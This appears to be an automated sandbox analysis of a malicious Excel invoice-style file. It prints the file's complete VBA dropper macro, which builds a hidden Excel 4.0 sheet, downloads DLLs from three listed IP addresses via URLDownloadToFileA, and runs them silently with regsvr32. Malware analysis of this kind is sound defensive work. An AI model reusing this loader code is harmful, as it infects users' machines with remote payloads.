      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443782963420258
      Encrypted:false
      SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
      MD5:BC74BF4AB8188396FD2874D71A5C4796
      SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
      SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
      SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):162688
      Entropy (8bit):4.25439646164881
      Encrypted:false
      SSDEEP:1536:C6PLrFNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:C6NNSc83tKBAvQVCgOtmXmLpLm4l
      MD5:C8BEF55152E43CAEAD2B8C29CBBBE84F
      SHA1:B1F25C1F0ECB6A09B68CC97ABCB41D1036743F87
      SHA-256:3A84BBB00ABFD27B981444C5033645C62C753547B4C98D72BC0F5FE4D7FE69CD
      SHA-512:2ABFBE651ECF320481C66FCBA37487B40CF9CA39524D59C8E9292723FF0DE8F9FB19A35F3FB4FB3EFB9C6E39911D26AAF09D3BFAC25221BF0AF24346DBEA4F45
      Malicious:false
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
      C:\Users\user\Fiosa.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.3741485480829125
      Encrypted:false
      SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
      MD5:15C440CEBA523F1FA008FAA03D09AC99
      SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
      SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
      SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\Fiosa1.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.3741485480829125
      Encrypted:false
      SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
      MD5:15C440CEBA523F1FA008FAA03D09AC99
      SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
      SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
      SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\Fiosa2.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.3741485480829125
      Encrypted:false
      SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
      MD5:15C440CEBA523F1FA008FAA03D09AC99
      SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
      SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
      SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
      Malicious:true
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri Sep 24 10:05:02 2021, Security: 0
      Entropy (8bit):7.828790165256729
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:Claim-680517779-09242021.xls
      File size:419328
      MD5:a5e00f88df7d7fc328f759cd99bcd3a0
      SHA1:b81aa5364f1fe9950dd0816082e9e2c7dcfa2375
      SHA256:a2e451f2873b727520bef058f84303de9991e4353aa5ed3589350b7ce6e92506
      SHA512:7a42c57506c748f6421f7b1006fd64d8c15575f34dca123f0f8028a5887353a20cc60b0637858bf40cb5a47a0c7472d07902f2d3820c71b4decaa10abe18a7bc
      SSDEEP:6144:Fk3hOdsylKlgxopeiBNhZF+E+W2kdAKTwapS+PS82DPz6ST4+e3G0Sb8duSgcVwx:e5Z8etSwuSgcfPwJjxwrcNDTfsXo/xr
      File Content Preview:........................>.......................................................b.......d.......f..............................................................................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "Claim-680517779-09242021.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1251
      Author:Test
      Last Saved By:Test
      Create Time:2015-06-05 18:17:20
      Last Saved Time:2021-09-24 09:05:02
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1251
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576

      Streams with VBA

      VBA File Name: UserForm1, Stream Size: -1
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1
      VBA File Name:UserForm1
      Stream Size:-1
      Data ASCII:
      Data Raw:
      VBA Code
      Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{6E2E223A-A629-4255-BA17-B75486DE444A}{A668B021-7649-4DE4-8D02-89E3EA2CFA2A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
      VBA File Name: Module1, Stream Size: 4112
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Module1
      VBA File Name:Module1
      Stream Size:4112
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 30 0d 00 00 00 00 00 00 01 00 00 00 41 a1 0d 0c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      Attribute VB_Name = "Module1"

Sub auto_open()
On Error Resume Next
Drezden = "="
Naret = "EXEC"
Application.ScreenUpdating = False
Gert
Sheets("Sheet5").Visible = False
Sheets("Sheet5").Range("A1:M100").Font.Color = vbWhite

Sheets("Sheet5").Range("H24") = UserForm1.Label1.Caption
Sheets("Sheet5").Range("H25") = UserForm1.Label3.Caption
Sheets("Sheet5").Range("H26") = UserForm1.Label4.Caption

Sheets("Sheet5").Range("K17") = "=NOW()"
Sheets("Sheet5").Range("K18") = ".dat"
Sheets("Sheet5").Range("K18") = ".dat"


Sheets("Sheet5").Range("H35") = "=HALT()"
Sheets("Sheet5").Range("I9") = UserForm1.Label2.Caption
Sheets("Sheet5").Range("I10") = UserForm1.Caption
Sheets("Sheet5").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet5").Range("I12") = "Byukilos"
Sheets("Sheet5").Range("G10") = "..\Fiosa.der"
Sheets("Sheet5").Range("G11") = "..\Fiosa1.der"
Sheets("Sheet5").Range("G12") = "..\Fiosa2.der"
Sheets("Sheet5").Range("I17") = "regsvr32 -silent ..\Fiosa.der"
Sheets("Sheet5").Range("I18") = "regsvr32 -silent ..\Fiosa1.der"
Sheets("Sheet5").Range("I19") = "regsvr32 -silent ..\Fiosa2.der"
Sheets("Sheet5").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet5").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet5").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet5").Range("H9") = Drezden & "REGISTER(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet5").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheet5").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheet5").Range("H19") = Drezden & Naret & "(I19)"


Application.Run Sheets("Sheet5").Range("H1")

End Sub

Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Sheet5").Delete
   Application.DisplayAlerts = True
End Sub

Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet5"
End Function
      VBA File Name: Sheet1, Stream Size: 991
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1
      Stream Size:991
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 41 a1 f7 99 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
      VBA File Name: ThisWorkbook, Stream Size: 2774
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook
      Stream Size:2774
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 a2 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff aa 04 00 00 5e 08 00 00 00 00 00 00 01 00 00 00 41 a1 88 0a 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean

Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
End Sub

Private Sub asWorkbook_Activateas()
    On Error Resume Next

    If m_isOpenDelayed Then
        m_isOpenDelayed = False
        InitWorkbook
    End If
End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next

    m_openAlreadyRan = True
    Dim objProtectedViewWindow As ProtectedViewWindow
    '
    On Error GoTo 0
    '
    m_isOpenDelayed = Not (objProtectedViewWindow Is Nothing)
    If Not m_isOpenDelayed Then InitWorkbook
End Sub

Private Sub ssaaInitWorkbookssaa()
    On Error Resume Next

    If VBA.Val(Application.Version) < 12 Then
        Me.Close False
        Exit Sub
    End If
    '
        'Other code
        '
        '
        '
End Sub
      VBA File Name: UserForm1, Stream Size: 1180
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/UserForm1
      VBA File Name:UserForm1
      Stream Size:1180
      Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . A . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 41 a1 c5 51 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{6E2E223A-A629-4255-BA17-B75486DE444A}{A668B021-7649-4DE4-8D02-89E3EA2CFA2A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 108
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:108
      Entropy:4.18849998853
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.65175227267
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:208
      Entropy:3.30164724619
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . 3 . B # . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 391141
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:391141
      Entropy:7.94597570807
      Base64 Encoded:True
      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . d . % 8 . . . . . . . X . @
      Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 661
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:661
      Entropy:5.27224586563
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 50 61 63 6b 61
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:116
      Entropy:3.35524796933
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/\x1CompObj
      File Type:data
      Stream Size:97
      Entropy:3.61064918306
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 301
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/\x3VBFrame
      File Type:ASCII text, with CRLF line terminators
      Stream Size:301
      Entropy:4.64742015018
      Base64 Encoded:True
      Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
      Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
      Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 263
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/f
      File Type:data
      Stream Size:263
      Entropy:3.59027175124
      Base64 Encoded:False
      Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . O
      Data Raw:00 04 24 00 08 0c 10 0c 04 00 00 00 ff ff 00 00 04 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 04 00 00 00 b4 00 00 00 00 84 01 01 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 a7 01 00 00 d4
      Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 272
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/o
      File Type:data
      Stream Size:272
      Entropy:3.7315998228
      Base64 Encoded:True
      Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 3 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 1 1 . 9 0 . 1 4 8 . 1 0 4 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 5 1 . 8 9 . 1 1 5 . 1 1 1 / . . . . . . . . . . . . . . . 5 . . . . . . .
